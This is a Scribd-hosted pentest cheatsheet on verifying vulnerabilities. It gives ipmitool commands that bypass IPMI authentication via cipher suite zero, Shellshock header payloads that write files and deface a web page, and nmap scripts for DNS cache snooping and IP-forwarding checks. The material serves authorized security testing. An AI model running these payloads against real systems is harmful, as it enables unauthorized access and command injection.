Scribd Logo
Upload

Welcome to Scribd!

  • Cheatsheet VulnVerify

    Uploaded by

    Roni Andria
    18 views1 page
    This document summarizes several vulnerabilities that can be verified, including an IPMI cipher suite zero authentication bypass that allows bypassing authentication when cipher suite zero is specified, a Bash remote code execution vulnerability via Shellshock, a DNS server cache snooping vulnerability that allows disclosing recently queried domain names, and detecting if IP forwarding is enabled on a system by attempting to route traffic through it. Tools like ipmitool, nmap, and scripts are provided to help verify each vulnerability.

    Original Description:

    Cheatsheet

    Original Title

    Cheatsheet_VulnVerify

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes several vulnerabilities that can be verified, including an IPMI cipher suite zero authentication bypass that allows bypassing authentication when cipher suite zero is specified, a Bash remote code execution vulnerability via Shellshock, a DNS server cache snooping vulnerability that allows disclosing recently queried domain names, and detecting if IP forwarding is enabled on a system by attempting to route traffic through it. Tools like ipmitool, nmap, and scripts are provided to help verify each vulnerability.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    18 views1 page

    Cheatsheet VulnVerify

    Uploaded by

    Roni Andria
    This document summarizes several vulnerabilities that can be verified, including an IPMI cipher suite zero authentication bypass that allows bypassing authentication when cipher suite zero is specified, a Bash remote code execution vulnerability via Shellshock, a DNS server cache snooping vulnerability that allows disclosing recently queried domain names, and detecting if IP forwarding is enabled on a system by attempting to route traffic through it. Tools like ipmitool, nmap, and scripts are provided to help verify each vulnerability.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 1

    Verify Various Vulnerabilities

    ------------------------------

    [+] IPMI Cipher Suite Zero Authentication Bypass:


    http://www.tenable.com/plugins/index.php?view=single&id=68931

    Tools required:
    ipmitool
    freeipmi-tools

    ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list

    # Specifying Cipher Suite Zero


    ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
    ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis
    status
    ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
    ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
    ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor

    [+] Bash Remote Code Execution (Shellshock)


    http://www.tenable.com/plugins/index.php?view=single&id=77823

    x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt


    x: () { :;}; echo "Hacked" > /var/www/hacked.html

    [+] DNS Server Cache Snooping Remote Information Disclosure


    http://www.tenable.com/plugins/index.php?view=single&id=12217

    Nmap Script: dns-cache-snoop


    http://nmap.org/nsedoc/scripts/dns-cache-snoop.html

    nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-


    snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>

    [+] IP Forwarding Enabled


    http://www.tenable.com/plugins/index.php?view=single&id=50686

    Nmap Script: ip-forwarding


    http://nmap.org/nsedoc/scripts/ip-forwarding.html

    sudo nmap -sn <target> --script ip-forwarding --script-


    args='target=www.example.com'

    Alternatives:
    - Set VM's default gateway as the victim IP address and attempt to route elsewhere.
    - http://pentestmonkey.net/tools/gateway-finder

    You might also like